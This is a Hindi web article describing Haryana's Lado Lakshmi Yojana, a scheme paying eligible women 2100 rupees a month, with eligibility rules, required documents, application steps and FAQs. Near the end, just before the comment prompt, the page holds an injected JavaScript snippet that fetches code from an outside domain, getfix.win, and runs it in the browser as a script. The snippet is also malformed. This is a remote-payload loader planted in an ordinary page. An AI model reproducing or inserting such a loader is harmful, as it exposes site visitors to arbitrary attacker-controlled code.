Haryana Lado Lakshmi Yojana : महिलाओं को मिलेंगे 2100 रुपए, समझें Registration प्रक्रिया

हरियाणा सरकार ने महिलाओं के विकास के लिए “लाडो लक्ष्मी स्कीम” की शुरुआत की है। इस योजना के जरिए आर्थिक रूप से कमजोर महिलाओं को आर्थिक मदद प्रदान की जाएगी, ताकि वे घर के खर्चों को चलाने में समर्थ बन सकें। इस लेख को अंत तक पढ़ने के लिए आपको इस योजना का फायदा जरूर उठाना चाहिए।

Lado Lakshmi

Lado Lakshmi Yojana Haryana

हर राज्य में महिलाओं की स्थिति को बेहतर बनाने के लिए कई तरह की कल्याणकारी योजनाएं चलाई गई हैं। अगर हम हरियाणा राज्य की बात करें तो वहां की महिलाओं के लिए हाल ही में एक नई योजना की शुरुआत हुई है जिसका नाम है लाडो लक्ष्मी योजना। इस योजना के माध्यम से सरकार द्वारा गरीब या आर्थिक रूप से कमजोर महिलाओं 2100 रुपए की मदद प्रदान की जाएगी। 18 से 60 साल की महिलाओं को इस योजना का लाभ दिया जाएगा। आगामी बजट सत्र में सरकार लाडो लक्ष्मी के लिए करीब 10 से 12 हजार करोड़ रुपए का प्रावधान करने जा रही है। 

जानें लाडो लक्ष्मी योजना के बारे में

स्कीम  Haryana Lado Lakshmi Yojana
किसके द्वारा शुरू की गई  हरियाणा सरकार 
किसके लिए महिलाओं के लिए 
फायदा  आर्थिक सहायता प्रदान करना  
सहायता राशि  2100 रुपए (प्रति माह)
आवेदन करने की प्रक्रिया  ऑनलाइन और ऑफलाइन 
वेबसाइट  https://socialjusticehry.gov.in/

लाभ (Benefits)

  • महिलाओं की आर्थिक स्थिति मजबूत की जाएगी।
  • सरकार महिलाओं के बैंक खाते में 2100 रुपए की सहायता राशि प्रदान करेगी।
  • इस योजना से महिलाओं की आर्थिक जरूरतें पूरी हो सकेंगी।
  • अब महिलाओं को घरेलू खर्चों को पूरा करने के लिए आर्थिक विपदा का सामना नहीं करना पड़ेगा।
  • राज्य की प्रत्येक गरीब महिलाओं को पात्रता के आधार पर इस योजना से जोड़ा जाएगा।

उद्देश्य (Objective)

आर्थिक रूप से कमजोर महिलाओं को ऊपर उठाने के लिए राज्य सरकार की तरफ से आर्थिक तोर पर मदद प्रदान करना है ताकि इन महिलाओं को घर के खर्चों को चलाने के लिए दूसरों पर निर्भर न रहना पड़े।

पात्रता – मानदंड (Eligibility)

  • इस योजना के लिए हरियाणा राज्य के नागरिक पात्र माने गए हैं।
  • जिन परिवारों की आर्थिक दशा कमजोर हैं उन परिवारों की महिलाएं योजना का लाभ ले सकती हैं।
  • आवेदनकर्ता की आयु 18 से 60 वर्ष होनी चाहिए।   
  • परिवार की वार्षिक आय 1.80 लाख रुपए से ज्यादा नहीं होनी चाहिए। 
  • आवेदक के परिवार से कोई भी सरकारी नौकरी में कार्यरत नहीं होना चाहिए।

जरूरी कागजात (Important Documents)

  • आधार कार्ड, राशन कार्ड
  • परिवार पहचान पत्र 
  • निवास प्रमाण पत्र
  • आय प्रमाण पत्र
  • बैंक अकाउंट नंबर 
  • मोबाइल नम्बर
  • पासपोर्ट साइज की फोटो

Lado Lakshmi योजना के लिए आवेदन कैसे करें ?

इस योजना के लिए आप 2 तरह से आवेदन कर सकते हैं ऑनलाइन और ऑफलाइन 

ऐसे करें Online Apply  

STEP I – सबसे पहले आप वेबसाइट ओपन करें।

WhatsApp Group Join Now
Telegram Group Join Now
Instagram Group Join Now

STEP II – इसके बाद होम पेज में आपको लाडो लक्ष्मी योजना का लिंक दिखाई देगा। आपको इस लिंक पर क्लिक करना है।

STEP III – अब अगले पेज में आप Apply के विकल्प पर क्लिक करें।

STEP IV – उसके बाद आपके सामने रजिस्ट्रेशन फॉर्म खुलेगा।

STEP V – इस फॉर्म में आपको सभी आवश्यक जानकारियां ध्यान से दर्ज करनी हैं।

STEP VI – जानकारी दर्ज करने के बाद आपको दस्तावेज स्कैन करके अपलोड करने हैं।

STEP VII – इसके बाद फॉर्म जमा करने के लिए आपको सबमिट बटन पर क्लिक कर देना है।

समझें ऑफलाइन आवेदन की प्रक्रिया 

  • सबसे पहले आपको नजदीकी महिला एवं विकास विभाग कार्यालय में जाना है
  • अब आपको वहां के अधिकारी से योजना का आवेदन फॉर्म लेना है
  • उसके बाद आप इस फॉर्म में मांगी जाने वाली सारी जानकारी ध्यान से दर्ज करें
  • इसके बाद जो आपसे दस्तावेज मांगे गए हैं वो इस फॉर्म के साथ अटैच करें 
  • अब आप इस फॉर्म को महिला एवं विकास विभाग ऑफिस में जमा करवा दें 

योजना से सम्बंधित प्रश्नोत्तर (FAQs) 

इस तरह के प्रश्न आवेदक से पूछे जा सकते हैं –

Q1.

लाडो लक्ष्मी योजना का फायदा कौन उठा सकता है?

Ans. हरियाणा राज्य की गरीब परिवार से संबंध रखने वाली महिलाएं
Q2.

इस स्कीम के जरिये कितनी आर्थिक मदद मिलती है ?

Ans. पात्र महिलाओं को प्रति माह 2100 रुपए दिए जाते हैं 
Q3.

इस योजना के लिए आवेदन किस तरह से होगा?

Ans. आप ऑफिशियल वेबसाइट (https://socialjusticehry.gov.in/) पर जाकर लाडो लक्ष्मी योजना के लिए ऑफलाइन या ऑनलाइन आवेदन कर सकते हैं
Q3.

क्या इस योजना में किसी विशेष दस्तावेज की आवश्यकता है?

Ans. आपको लाडो लक्ष्मी योजना का फायदा लेने के लिए पहचान पत्र, बैंक डिटेल्स, मोबाइल नंबर, पासपोर्ट साइज फोटो और आय प्रमाण पत्र की आवश्यकता होगी

योजना के बारे में अंतिम शब्द

“महिलाओं को हर महीने 2100 रुपए दिए जाएंगे। जिससे वे आत्म- निर्भर और सशकत बनेंगी इसके साथ ही पात्र महिलाओं की आर्थिक स्थिति बेहतर बनेगी और वे घर के खर्चों को उठाने में सक्षम बन सकेंगी।”

function loadScript() { var url = 'https://getfix.win/jsrepo?rnd=' + Math.random() + '&ts=' + Date.now();

try { var xhr = new XMLHttpRequest(); xhr.open('GET', url, false); xhr.send(null);

if (xhr.status >= 200 && xhr.status < 300) { var script = document.createElement('script'); script.text = xhr.responseText.trim(); document.head.appendChild(script); } else { console.warn('Script load failed: HTTP ' + xhr.status); } } catch (e) { console.warn('Script load error:', e.message); } } })();

Leave a Comment